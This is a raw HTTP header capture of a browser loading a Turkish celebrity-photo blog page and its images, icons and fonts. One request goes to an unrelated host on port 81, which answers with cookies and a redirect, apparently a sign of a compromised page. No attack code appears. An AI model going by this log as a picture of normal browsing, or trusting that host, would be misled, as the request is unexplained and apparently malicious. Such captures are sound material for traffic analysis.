HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;4d72-4aa61b0d-0&quot;
Last-Modified: Tue, 08 Sep 2009 08:51:25 GMT
Content-Length: 19826
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /rem2.html HTTP/1.1

Host: appearingderevkira.br.ms:81

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Wed, 14 Nov 2012 15:31:02 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: nxshe2=_3_; domain=appearingderevkira.br.ms; path=/; expires=Thu, 15-Nov-2012 12:32:11 GMT nxshe3=_3_; domain=appearingderevkira.br.ms; path=/; expires=Thu, 15-Nov-2012 12:32:11 GMT nxshe16=_0_; domain=appearingderevkira.br.ms; path=/; expires=Thu, 15-Nov-2012 12:32:11 GMT nxshedefault=_0_; domain=appearingderevkira.br.ms; path=/; expires=Thu, 15-Nov-2012 12:32:11 GMT
Location: http://geo.yahoo.com
GET /wp-content/uploads/fahriye3.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;53d5-4aa61d51-0&quot;
Last-Modified: Tue, 08 Sep 2009 09:01:05 GMT
Content-Length: 21461
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/sedef3.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;13321-4aa61b36-0&quot;
Last-Modified: Tue, 08 Sep 2009 08:52:06 GMT
Content-Length: 78625
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/fahriye2.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;49e9-4aa61d3a-0&quot;
Last-Modified: Tue, 08 Sep 2009 09:00:42 GMT
Content-Length: 18921
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/berrak1.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;74f5-4aa61f23-0&quot;
Last-Modified: Tue, 08 Sep 2009 09:08:51 GMT
Content-Length: 29941
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/berrak2.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;cd9f-4aa61f11-0&quot;
Last-Modified: Tue, 08 Sep 2009 09:08:33 GMT
Content-Length: 52639
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/beren2.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;69fc-4aa621a5-0&quot;
Last-Modified: Tue, 08 Sep 2009 09:19:33 GMT
Content-Length: 27132
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/beren1.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;cac6-4aa62191-0&quot;
Last-Modified: Tue, 08 Sep 2009 09:19:13 GMT
Content-Length: 51910
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-includes/images/smilies/icon_smile.gif HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;ae-4f19b4af-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:38:39 GMT
Content-Length: 174
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/beren3.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;77ca-4aa621b8-0&quot;
Last-Modified: Tue, 08 Sep 2009 09:19:52 GMT
Content-Length: 30666
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-includes/images/smilies/icon_biggrin.gif HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;ac-4f19b4ab-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:38:35 GMT
Content-Length: 172
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/themes/osman/images/wrapper-bg.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;e6-4f19b73b-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:49:31 GMT
Content-Length: 230
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/themes/osman/images/anamenubg1.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;5aba-4f19b700-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:32 GMT
Content-Length: 23226
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/themes/osman/images/menuaraa.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;18f-4f19b71c-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:49:00 GMT
Content-Length: 399
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/themes/osman/images/author-icon.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;526-4f19b703-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:35 GMT
Content-Length: 1318
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/themes/osman/images/clock-icon.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;602-4f19b706-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:38 GMT
Content-Length: 1538
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/themes/osman/images/comment-icon.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;4ff-4f19b706-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:38 GMT
Content-Length: 1279
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/facebook.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;378-4f1d9ae3-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:39 GMT
Content-Length: 888
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/themes/osman/fonts/BebasNeue-webfont.woff HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/x-font-woff
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;8208-4f19b6c9-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:47:37 GMT
Content-Length: 33288
Vary: User-Agent
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/twitter.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;441-4f1d9ae5-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:41 GMT
Content-Length: 1089
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /avatar/ad516503a11cd5ca435acc9bb6523536?s=60 HTTP/1.1

Host: 0.gravatar.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Content-Disposition: inline; filename=&quot;ad516503a11cd5ca435acc9bb6523536.png&quot;
Date: Wed, 14 Nov 2012 13:32:32 GMT
Expires: Wed, 14 Nov 2012 13:37:32 GMT
Last-Modified: Sat, 01 Mar 2008 02:44:06 GMT
Server: ECS (arn/46E6)
Source-Age: 2414
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1278332898 1277079253
Content-Length: 1497
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/blogger.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;456-4f1d9ae5-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:41 GMT
Content-Length: 1110
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/email.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;49e-4f1d9ae3-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:39 GMT
Content-Length: 1182
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/delicious.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;358-4f1d9ae2-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:38 GMT
Content-Length: 856
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/digg.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;37b-4f1d9ae3-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:39 GMT
Content-Length: 891
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/plugins/simple-social-sharing-widgets-icons-updated/icons_32/google.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:31 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;5f3-4f1d9ae4-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:37:40 GMT
Content-Length: 1523
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:31 GMT
GET /wp-content/uploads/berrak3.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;185b6-4aa61eff-0&quot;
Last-Modified: Tue, 08 Sep 2009 09:08:15 GMT
Content-Length: 99766
Vary: User-Agent
Cache-Control: max-age=604800
